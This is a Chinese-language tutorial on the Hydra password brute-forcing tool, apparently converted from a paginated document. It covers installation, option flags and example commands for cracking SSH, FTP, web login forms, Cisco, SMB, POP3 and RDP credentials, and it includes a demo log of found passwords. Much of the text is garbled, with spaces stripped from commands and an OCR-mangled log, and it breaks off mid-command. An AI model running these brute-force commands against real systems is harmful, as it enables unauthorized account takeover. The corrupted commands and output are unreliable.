密碼破解滲透工具-Hydra

1、密碼破解滲透工具Hydra這款暴力密碼破解工具相當(dāng)強(qiáng)大，支持幾乎所有協(xié)議的在線密碼破解，其密碼能否被破解關(guān)鍵在于字典是否足夠強(qiáng)大。對(duì)于社會(huì)工程型滲透來(lái)說(shuō)，有時(shí)能夠得到事半功倍的效果。簡(jiǎn)介hydra是著名黑客組織thc的一款開(kāi)源的暴力密碼破解工具，可以在線破解多種密碼。官網(wǎng)：/thc-hydra,可支持AFP,CiscoAAA,Ciscoauth,Ciscoenable,CVS,Firebird,ftp,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP-head,HTTP-PROXY,HTTPS-FORM-GET,HTTPS-FORM-POST,HTTPS-G

2、ET,HTTPS-HEAD,HTTP-Proxy,ICQ,IMAP,IRC,LDAP,MS-SQL,mysql,NCP,NNTP,OracleListener,OracleSID,Oracle,PC-Anywhere,PCNFS,POP3,POSTGRES,RDP,rexec,rlogin,rsh,SAP/R3,SIP,SMB,SMTP,SMTPEnum,SNMP,SOCKS5,型(v1andv2),Subversion,Teamspeak仃S2),telnet,VMware-Auth,VNCandXMPP等類型密碼。安裝如果是Debian和Ubuntu發(fā)行版，源里自帶hydra,直接用apt

3、-get在線安裝：sudoapt-getinstalllibssl-devlibssh-devlibidn11-devlibpcre3-devlibgtk2.0-devlibmysqlclient-devlibpq-devlibsvn-devfirebird2.1-devlibncp-devhydraRedhat/Fedora發(fā)行版的下載源碼包編譯安裝，先安裝相關(guān)依賴包：yuminstallopenssl-develpcre-develncpfs-develpostgresql-devellibssh-develsubversion-develhydra下載地址： HYPERLINK http

4、:/www.thc.Org/releases/hydra-7.3._taf.gz http:/www.thc.Org/releases/hydra-7.3._taf.gztarzxvfhydra-7.0-src.tar.gzcdhydra-7.0-src./configuremakemakeinstallhydra支持GUI圖形界面，不過(guò)習(xí)慣還是命令好用。參數(shù)說(shuō)明搜hydra-llogin|-Lfile-pPASS|-PFILE|-CFILE-ens-oFILE-tTASKS-MFILE-TTASKS-wtime-f-sPORT-S-vVserverserviceOPT-R繼續(xù)從上一次進(jìn)度接著

5、破解。-S采用SSL鏈接。-sPORT可通過(guò)這個(gè)參數(shù)指定非默認(rèn)端口。-lLOGIN指定破解的用戶，對(duì)特定用戶破解。-LFILE指定用戶名字典。-pPASS小寫(xiě)，指定密碼破解，少用，一般是采用密碼字典。-PFILE大寫(xiě)，指定密碼字典。-ens可選選項(xiàng)，n：空密碼試探，s：使用指定用戶和密碼試探。-CFILE使用冒號(hào)分割格式，例如“登錄名:密碼”來(lái)代替-L/-P參數(shù)。-MFILE指定目標(biāo)列表文件一行一條。-oFILE指定結(jié)果輸出文件。-f在使用-M參數(shù)以后，找到第一對(duì)登錄名或者密碼的時(shí)候中止破解。-tTASKS同時(shí)運(yùn)行的線程數(shù)，默認(rèn)為16。-wTIME設(shè)置最大超時(shí)的時(shí)間，單位秒，默認(rèn)是30s。-v

6、/-V顯示詳細(xì)過(guò)程。server目標(biāo)ipservice指定服務(wù)名，支持的服務(wù)和協(xié)議：telnetftppop3-ntlmimap-ntlmsmbsmbnthttp-head|gethttp-get|post-formhttp-proxyciscocisco-enablevncldap2ldap3mssqlmysqloracle-listenerpostgresnntpsocks5rexecrloginpcnfssnmprshcvssvnicqsapr3sshsmtp-auth-ntlmpcanywhereteamspeaksipvmauthdfirebirdnepafp等等。實(shí)例手動(dòng)創(chuàng)建用戶名

7、字典和密碼字典在這里只是為了演示，只加了幾個(gè)用戶名和弱口令。真正破解時(shí)，需要利用密碼字典生成器生成強(qiáng)大的字典。破解ssh：#hydra-Lusers.txt-Ppassword.txt-t1-vV-ens04sshrootTS-DEVhydraLusers.txt-Ppassord-txt-t1-W-ens04sshHydra*7.Jul匚)2012byvanHauseryTHC&DavidMaciejak-forlga.lpurposesonlyHydra(http;tlhc.oirigflih匚一hydra)startingat2013-DI-0122;06;07aTA1task,1耳er

8、verr32logintriesCli:4/p:S),32triespertaskDATAattacklngeevicesshonpoirt22Res&lvtngaddressesdonetargettargettargetTargettarget；verbose_attejv.pt1attemptATTEMPTattemptattemptLTTEWPTattemptATTEMPTATTEMPT:ATTEMPTattempt!；ATTQVPTJTTEM卩巧attenftdTTlEWrTTEPTJTTE：PTATTENFTbatteptTT匚IMPTj；ATTEJVPTattemptATTHVP

9、t:ATTEMPTattempt!attemptATTEMPT_statusanackfinishedfor192.ls58a1.104(weiring1of1targetsu仁ue于芳fulTHydra(http:/wwtheorgraotffiTS-DEV持.1921B:L1D4192：L6E:L1041QD4041921石工1)4host:192)6E：L：L社斗targettargettargettargettargettargethost:192.IBS.1.IMtargetlargertargettargettargetTargettargettargettargettarg已tt

10、argettargettargettargettargettarget192.168/1.LDa04D404192.168.1.LD404041921五百:L104D4192.168B1.104192：LE：L.104192:：LG：L192.16E.1.LD4192:LG咅110419216名:L10404192.16B.1.104192：L6E：L.104192.168.1：LU4_loginlogin-login一login-in1n:-login_login一login一loginlogin一loiginlogin:一login-login_login一login一loginlogin

11、一login一login一login-login一login-login_login一log-inlogin-login1BrootTi-1of32cMId0IErr-2of32child0a,adm1nistrator-3of32chiId0radm1ni23-4ofB2child0.wabcl23-5of32child0passwo-rd:abclSBprdau1dF,-gof32匚h1ldQrtri-10of32child0,radmim5tratorr-11of32childQ,admirCL23u-12of22child0abcizs-13Of32Child0rr123456-14o

12、f32child0password:123456-pass，八-pass-pass一pass-pass-pass-pass-.Pass一passpass-pass一一passrootrootdauld-pzssdavid-pa51cdavid-passdavid-passdavld-pass,rdavid-passdayidEirtux，rt1nux,rfinuxnHxtinuxHnuxT,linuxT,linuxpoGtgreE_pDtgrEs-postgres_postgrws_postgres-postgres11_postgrespostgra_1-inuw-17of32Lch-iId

13、0，,r,-18OT3ZLChildOadminisTrator-19afJZchild0adm-irTL123r-2Dof32chilaOabcl231-?1of益child0，r123456r,-22Df32Child0password-23of_passwordpasapasspasspasspassEams_forchildrentoiycompleted.2validpaswordafoundI/the-hydra)finishedst2013-D1-0122:06:10child0124of32childO；posTgres-25at32chld,rG-2Cof3?Fchild0a

14、dmdndstratDr-L*admdrd.23abcl23,P-,r123456ir-password1password27of32child0-28of32child0Of32child0of32chiIdQ|31of32child0-32of32child0ciynpfetelesrs)破解成功，直接顯示結(jié)果。也可以使用-o選項(xiàng)指定結(jié)果輸出文件#hydra-Lusers.txt-Ppassword.txt-t1-vV-ens-osave.log04ssh其他類型密碼破解在破解ftp：hydraipftp-l用戶名-P密碼字典-t線程（默認(rèn)16）-vVhydraipftp-l用戶名-P密碼

15、字典-ens-vVget方式提交，破解web登錄：hydra-l用戶名-p密碼字典-t線程-vV-ensiphttp-get/admin/hydra-l用戶名-p密碼字典-t線程-vV-ens-fiphttp-get/admin/index.phppost方式提交，破解web登錄：該軟件的強(qiáng)大之處就在于支持多種協(xié)議的破解，同樣也支持對(duì)于web用戶界面的登錄破解，get方式提交的表單比較簡(jiǎn)單，這里通過(guò)post方式提交密碼破解提供思路。該工具有一個(gè)不好的地方就是，如果目標(biāo)網(wǎng)站登錄時(shí)候需要驗(yàn)證碼就無(wú)法破解了。帶參數(shù)破解如下：vinputtype=submitname=subvalue=提交假設(shè)有以上

16、一個(gè)密碼登錄表單，我們執(zhí)行命令：hydra-ladmin-Ppass.lst-ook.lst-t1-fhttp-post-form“index.php:name二“USER”&pwd二“PASS:invalido”說(shuō)明：破解的用戶名是admin,密碼字典是pass.lst,破解結(jié)果保存在ok.lst,-t是同時(shí)線程數(shù)為1，-f是當(dāng)破解了一個(gè)密碼就停止，ip是本地，就是目標(biāo)ip，http-post-form表示破解是采用http的post方式提交的表單密碼破解。后面參數(shù)是網(wǎng)頁(yè)中對(duì)應(yīng)的表單字段的name屬性，后面vtitle中的內(nèi)容是表示錯(cuò)誤猜解的返回信息提示,可以自定義。破解https：hydra-m/index.php-lmuts-Ppass.txt8https破解teamspeak：hydra-l用戶名-P密碼字典-s端口號(hào)-vVipteamspeak破解cisco：hydra-Ppass.txt8ciscohydra-mcloud-Ppass.txt8cisco-enable破解smb：hydra-ladministrator-Ppass.txt8smb破解pop3：hydra-lmuts-Ppass.txtmy.pop3.mailpop3破解rdp：hydraiprdp-ladministra